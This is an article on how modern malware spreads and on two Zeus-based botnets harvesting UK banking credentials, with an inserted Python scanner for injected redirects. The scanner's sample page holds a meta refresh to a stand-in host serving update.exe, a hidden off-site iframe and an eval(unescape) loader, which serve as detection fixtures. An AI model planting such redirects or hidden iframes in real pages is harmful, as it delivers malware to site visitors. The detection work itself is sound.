Modern Malware – 2 New Zeus-2 Botnets

Today’s malware differs dramatically from the threats we faced just a few years ago, when most malicious programs were written to earn online bragging rights.  Malware made the user aware of its existence through a displayed message, music (as in the Yankee Doodle Dandy virus family), some sort of harmless mischief, or worst case, by wiping out a hard drive. Those were the good old days.

Modern malware is written by professional criminals.  In most cases, users are tricked into executing a Trojan horse program (a program disguised as, or hidden inside, another program) that either carries the real payload itself or opens the way for it and downloads it.  Users think they are installing needed or desirable software, often “recommended” by a site that they trust.  Malware producers routinely break into legitimate websites using commonly known vulnerabilities and modify Web pages to include malicious JavaScript redirects.  Malicious code can even be hidden inside a banner ad on a website, supplied by legitimate ad services and distributed to a wide array of legitimate sites.  When the user surfs to the legitimate website, the malicious JavaScript is loaded, prompting the user to install a program or redirecting the unknowing user to another website where they are told to install a necessary program, codec, software update or patch.
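The injected-redirect patterns described above (hidden iframes pointing off-site, meta refreshes that leave the site, obfuscated inline scripts, location changes to another host) can be triaged mechanically when checking a site for compromise. The following Python scanner is an added example, not code from the original article or from Trusteer or AVG; the sample page, the hostnames widgets.example and evil-codec.example, and the heuristics themselves are constructed assumptions for illustration, not a complete detector.

```python
"""Scan page HTML for injected-redirect indicators (added example).

Heuristics used here are assumptions for illustration: hidden or off-site
iframes, meta refreshes that leave the site, inline scripts that stack
obfuscation primitives, and location assignments to another host.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample: a normal page with an injected meta refresh, a hidden
# off-site iframe and an obfuscated script (the percent-encoded string decodes
# to document.write('</script>')).
SAMPLE_HTML = """<html><head><title>Widgets Inc</title>
<meta http-equiv="refresh" content="0;url=http://evil-codec.example/update.exe">
</head><body>
<h1>Welcome</h1>
<script src="/js/site.js"></script>
<iframe src="http://evil-codec.example/load.php" width="0" height="0" style="display:none"></iframe>
<script>eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%2f%73%63%72%69%70%74%3e%27%29"))</script>
</body></html>"""

OBFUSCATION_MARKERS = ("unescape(", "eval(", "fromCharCode", "document.write(")
LOCATION_RE = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]")


class _Collector(HTMLParser):
    """Gather iframes, meta tags and inline script bodies from the page."""

    def __init__(self):
        super().__init__()
        self.iframes, self.metas, self.scripts = [], [], []
        self._script_buf = None  # list while inside <script>, else None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(a)
        elif tag == "meta":
            self.metas.append(a)
        elif tag == "script":
            self._script_buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)


def _is_offsite(url, site_host):
    """True when the URL has a host and it is not the site's own host."""
    host = urlparse(url).hostname
    return bool(host) and host.lower() != site_host.lower()


def _is_hidden(attrs):
    """Hidden via CSS, or sized to 0/1 pixels in both dimensions."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    dims = [attrs.get(k, "").lower().rstrip("px") for k in ("width", "height")]
    return all(d in ("0", "1") for d in dims)


def find_injected_redirects(html, site_host):
    """Return (kind, detail) findings for a page served from site_host."""
    c = _Collector()
    c.feed(html)
    findings = []
    for a in c.iframes:
        src = a.get("src", "")
        if _is_hidden(a) or _is_offsite(src, site_host):
            findings.append(("hidden_or_offsite_iframe", src))
    for a in c.metas:
        if a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.I)
            if m and _is_offsite(m.group(1), site_host):
                findings.append(("offsite_meta_refresh", m.group(1)))
    for body in c.scripts:
        # Two or more stacked primitives (eval + unescape etc.) is the usual
        # shape of an injected loader; decode percent-escapes for the analyst.
        if sum(marker in body for marker in OBFUSCATION_MARKERS) >= 2:
            findings.append(("obfuscated_script", unquote(body).strip()[:80]))
        for m in LOCATION_RE.finditer(body):
            if _is_offsite(m.group(1), site_host):
                findings.append(("offsite_location_redirect", m.group(1)))
    return findings


if __name__ == "__main__":
    for kind, detail in find_injected_redirects(SAMPLE_HTML, "widgets.example"):
        print(f"{kind}: {detail}")
```

Run against the constructed page the scanner reports the hidden iframe, the off-site meta refresh and the obfuscated script, and nothing for the site's own script include. In practice the hostname allow-list would also cover the site's CDN and the ad networks it legitimately uses, which is exactly where the malvertising case described above is hard to separate from normal traffic.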

Zeus is a piece of malicious software that combines botnet (connected and remotely controlled computer systems) and financial theft capabilities.  It is a Trojan horse program that spreads other bot agents and malware components quickly, can be adapted for multiple purposes, is available in simple botnet-building kits, and serves as the platform for a growing number of botnets being exploited across the globe, according to experts.  In the past few days, researchers at Trusteer and AVG revealed details about two new Zeus-based botnets, suggesting the Trojan kit is more popular with online criminals, and more prolific, than ever.

Trusteer announced it uncovered a large Zeus version 2 botnet that is operated and controlled from Eastern Europe and is used to conduct financial fraud in the U.K.  The botnet appears to be controlling more than 100,000 infected computers, 98% of which belong to U.K. Internet users.  The criminals have been harvesting all manner of potentially lucrative credentials, including online account IDs, bank login information, credit and debit card numbers, account types and balances, bank statements, browser cookies, client-side certificates, login information for email accounts and social networks, and even FTP passwords.  Trusteer discovered the extent of the botnet after gaining access to the botnet’s information drop servers and command and control center, which contained “hundreds of thousands” of stolen credentials.  By harvesting client-side certificates and cookies, the cybercriminals can extract a lot of extra information on the user that can be used to augment their illegal access to those users’ online accounts.

Separately, researchers at AVG released a white paper (PDF) that outlines details on Mumba, a new Zeus-based botnet that immediately infected more than 35,000 computers when it launched in April.  The botnet has now collected at least 60 GB of information from some 55,000 computers, half of which are in the U.K. and Germany, according to an AVG analysis of a server that was used to collect the data.  The Mumba botnet is probably controlled by the Avalanche Group, which specializes in phishing sites and malware.  It uses at least four different variants of Zeus, which can be adapted to send spam, steal financial information, or spread malware.  The Mumba botnet is probably one of the first to use the Avalanche operation to host its stolen goods as well as the malware infection, the white paper says.